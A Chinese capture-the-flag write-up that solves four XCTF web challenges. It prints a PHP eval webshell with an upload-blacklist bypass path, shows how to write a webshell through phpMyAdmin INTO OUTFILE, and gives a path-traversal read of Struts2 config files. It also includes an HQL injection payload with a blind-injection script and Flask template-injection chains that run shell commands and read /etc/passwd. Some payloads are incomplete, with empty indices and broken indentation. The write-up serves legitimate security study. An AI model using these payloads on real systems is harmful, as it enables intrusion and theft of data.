攻防世界(XCTF)WEB(进阶区)write up(四)

ics-07

 Web_php_include

 Zhuanxv

Web_python_template_injection

ics-07

题前半部分是php弱类型

这段说当传入的id值浮点值不能为1，但是id的最后一个数必须为9，session才能为admin

当id为1a9时可符合上面的要求

看看上传的源码:

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

利用正则检测的文件后缀名 黑名单模式

突破后缀黑名单思路:

一种是Web中间件的解析漏洞 , 因为已经知道中间件是Apache2 , 使用的是PHP . 所以无非就是Apache解析漏洞或者PHP CGI解析漏洞

一种是通过上传.htaccess文件 , 要使用该功能需要Apache在配置文件中设置AllowOverride All , 并且启用Rewrite模块 , 经过测试发现上传的.htaccess无法生效

[/var/www/html/uploaded/backup/]$ cat /etc/mime.types | grep php
#application/x-httpd-php            phtml pht php
#application/x-httpd-php-source            phps
#application/x-httpd-php3            php3
#application/x-httpd-php3-preprocessed        php3p
#application/x-httpd-php4            php4
#application/x-httpd-php5            php5

发现很多文件后缀都使用了application/x-httpd-php这个解析器

其中 phps 和 php3p 都是源代码文件 , 无法被执行 . 而剩下所有的后缀都被正则表过滤 , 所以这种方式也无法成功上传可执行文件

这道题利用了一个Linux的目录结构特性

linux中创建了一个目录为1.php , 都会在其中自动创建两个隐藏文件  .. 和 .

构造:

con=<?php @eval($_POST[qing]);?>&file=qing.php/qing.php/..

Web_php_include

发现phpinfo()可以看到绝对路径   和  phpmyadmin

进入phpmyadmin页面   root直接空密码登录

查看phpmyadmin变量 secure file priv 值为空  说明可以写入一句话

测试到/tmp 目录可以写入，也可以包含读取。
 于是将一句话写入/tmp，菜刀链接文件包含页面，得到flag

<?php eval(@$_POST['qing']); ?>

select "<?php eval(@$_POST['qing']); ?>"into outfile '/tmp/qing.php'  

http://111.198.29.45:43025/?page=/tmp/qing.php 菜刀链接

Zhuanxv

XCTF 4th-SCTF-2018

扫描发现 list目录

爆破注入没成功 看看源码

传参方式取图片 站点发现是java  fuzz下

这里fuzz时候还要多fuzz下目录 这里是../../WEB-INF/web.xml

配置文件里面写的是Struts2

关于Struts2目录结构

https://www.cnblogs.com/pigtail/archive/2013/02/12/2910348.html

Struts 2框架有两个核心配置文件，其中struts.xml文件主要负责管理应用中的Action映射，以及该Action包含的Result定义等。除此之外，Struts 2框架还包含     struts.properties文件，该文件定义了Struts 2框架的大量属性，开发者可以通过改变这些属性来满足应用的需求。

Struts2在WEB-INF目录的class目录下有个核心的xml文件

读取struts.xml文件

http://111.198.29.45:39585/loadimage?fileName=../../WEB-INF/classes/struts.xml

这里class里面可以看到很多class类名  尝试下载

访问../../WEB-INF/classes/applicationContext.xml，获取class文件路径和项目配置信息、数据库信息

http://111.198.29.45:32744/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml

发现 有个user.hbm.xml项

​ 从user.hbm.xml得知表名和类名映射

逐个下载配置文件class  在com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则，用户名只过滤空格和等号，密码限制只能字母+数字

可以看到拼接的sql语句 直接拼接的name和password变量造成注入  这里是hql语句

设计到hql注入

注入payload:

admin%%0Aor%0A%%%3E%

盲注脚本

import requests
s=requests.session()

flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
  payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
        #print payload
        url="http://121.196.195.244:9032/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1=s.get(url)
        #print url
        #print len(r1.text)
        if len(r1.text)>20000 and p!='':
            flag+=p
            print i,flag
            break
        p=chr(j)

Web_python_template_injection

一道有意思的python模版注入(SSTI)

发现存在SSTI  把{{}}中的内容当变量去解析并执行了

FLASK中config是配置为对象  这里使用这个对象的item方法查看信息

config.items()

查查看所有模块

[].__class__.__base__.__subclasses__()

因为如果执行命令需要os模块 这里os模块是在warnings.catch_warnings模块  先找warnings.catch_warnings模块  为第59个

查看warnings.catch_warnings模块的全局函数  利用到的是func_globals.keys()

[].__class__.__base__.__subclasses__()[].__init__.func_globals.keys()

可以看到 linecache函数，os模块就在其中

查看flag文件所在

().__class__.__bases__[].__subclasses__()[].__init__.func_globals.values()[]['eval']('__import__("os").popen("ls").read()' )

{{].__subclasses__()[]("fl4g").read()}}

读取文件 利用到的是object对象下的file类的read函数

[].__class__.__base__.__subclasses__()[]('/etc/passwd').read()